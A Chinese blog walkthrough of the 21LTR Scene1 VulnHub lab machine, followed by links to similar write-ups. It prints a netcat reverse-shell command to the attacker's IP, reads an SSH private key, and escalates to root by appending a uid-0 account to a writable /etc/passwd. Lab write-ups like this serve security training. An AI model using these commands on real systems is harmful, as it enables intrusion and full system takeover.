21LTR.com_Scene1_2.120_v1.0靶机

最新推荐文章于 2024-07-31 19:29:25 发布
最新推荐文章于 2024-07-31 19:29:25 发布
阅读量172 收藏 1
点赞数 7
文章标签: 网络 服务器 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/140807825
版权

信息收集并getshell

1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.2.0网段网卡,将靶机设置成仅主机模式

2.主机发现

3.nmap扫描端口

4.访问80端口

5.右键查看源代码

6.发现登录凭证,尝试ssh连接发现失败,尝试ftp连接连接成功

7.ls 发现有一个.php文件

8.将这个文件下载到本地

get backup_log.php

9.另起一个终端查看文件

10.拼接/backup_log.php

11.在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell

12.在后边拼接?cmd=id

13.kali监听并把网址后边id换成nc%20-e%20/bin/sh%20192.168.2.129%20443

提权

建立交互式的shell

python -c 'import pty; pty.spawn("/bin/sh")'

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

cat id_rsa

查看/etc/passwd文件验证,发现确实存在hbeale用户

ssh连接

连接成功发现是普通用户

尝试 /etc/passwd 如果是可写的就可以添加高权限用户

openssl passwd 123456

将创建的用户跟密码写入到/etc/passwd

echo 'newuser1:$1$/puWoURX$b7pNyzIq0wsd5qBwnvKJX.:0:0:root:/root:/bin/bash' >> /etc/passwd

切换用户newuser1

发现提权成功

左提溜
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 711
  练习环境     攻击机:kali     靶机:21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
LTR-578ALS-031WA_FINAL_DS_V1.0.pdf
04-07
The LTR-578ALS-031WA is an integrated low voltage I2C ambient light sensor (ALS), and proximity sensor (PS), with built-in emitter in a single miniature chipled lead-free surface mount package.
21LTR.com_Scene1_2.120_v1.0靶机复现
weixin_52956666的博客
07-31 199
查看/media/USB_1/Stuff/Keys下的id_rsa文件。将kali和虚拟机都设置为仅主机模式,网段都为192.168.2。使用telnet 192.168.2.120 10001连接。cd到ssh文件下,进行config文件编辑。ls查看有backup_log.php文件。ftp 192.168.2.120连接。密码:zg]E-b0]+8:(58G。输入账号密码发现连接失败。查看源码发现有账号密码。查看内容暂无有价值内容。读取etc/shdow。将文件保存到kali。发现root用户密码。
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 298
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
21LTR.com_Scene1_2.120靶机
2401_84564260的博客
07-30 485
创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。su切换newuser用户。查看靶机的mac地址。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 437
21LTR: Scene 1打靶记录
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 384
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 236
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
21ltr-scene-1靶机
m0_65285254的博客
07-31 246
根据靶机描述,该靶机静态ip地址为192.168.2.120。因为之前扫描到ftp,ssh端口开放,使用该密码分别进行连接。ls查看文件,发现 backup_log.php 文件。利用/etc/passwd可写提权,写入用户到该文件中。访问/logs/backup_log.php 成功。按照格式将其echo到文件/etc/passwd中。扫描开放的全端口 开放21,22,80端口。当在网页上拼接访问logs时,访问被拒绝。将其下载到本地,在kali上查看内容。没发现什么功能点,对其进行目录扫描。
Hack the 21LTR: Scene 1 靶机
hqy250019的博客
07-30 302
在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
l-sock.zip_linux socket_socket_socket linux_zip
09-14
例如,"i\dw-logo2.gif"可能是一个网站或文档的logo,"i\icon-pdf-ltr.gif"可能表示一个从左到右阅读的PDF文档图标。 综上所述,这个压缩包中的内容很可能详细阐述了如何在Linux环境中使用Socket API进行网络编程,...
tcl.zip_Fish!?_fish_tcl fish_tcl程序_小程序
09-24
2. `i\icon-pdf-ltr.gif` 和 `i\icon-pdf-a4.gif` - 这些图标可能关联于PDF文件的显示,可能是在程序中表示不同方向(左到右`ltr`和可能的A4尺寸)的PDF文档。 3. `i\h-section.gif`, `i\xsection.gif`, `i\section....
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
最新发布
互联网架构小马的博客
07-31 333
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全和安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 407
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
2401_84466225的博客
07-29 589
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 989
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
Ltr_retriever安装
07-14
要安装 Ltr_retriever,请按照以下步骤进行操作: 1. 首先,确保您的计算机上已经安装了 Python 3.6 或更高版本。您可以在命令行中运行以下命令来验证您的 Python 版本: ``` python --version ``` 2. 接下来,使用以下命令克隆 Ltr_retriever 仓库: ``` git clone https://github.com/codertimo/LTR-retriever.git ``` 3. 进入 Ltr_retriever 目录: ``` cd LTR-retriever ``` 4. 安装依赖项。您可以使用 pip 来安装所需的 Python 包: ``` pip install -r requirements.txt ``` 5. 安装 ElasticSearch。您可以根据您的操作系统和偏好,选择适合您的安装方法。可以在 ElasticSearch 官方网站上找到相应的安装指南。 6. 配置 ElasticSearch。在 `LTR-retriever/configs` 目录下,有一些示例配置文件可以供您参考。您可以根据您的需求进行相应的修改。 7. 运行 Ltr_retriever。您可以通过运行以下命令来启动 Ltr_retriever: ``` python main.py ``` 这样,您就成功安装了 Ltr_retriever。请注意,这只是一个简单的安装指南,具体的步骤可能会根据您的操作系统和环境而有所不同。如有需要,请参考 Ltr_retriever 仓库中的文档和指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值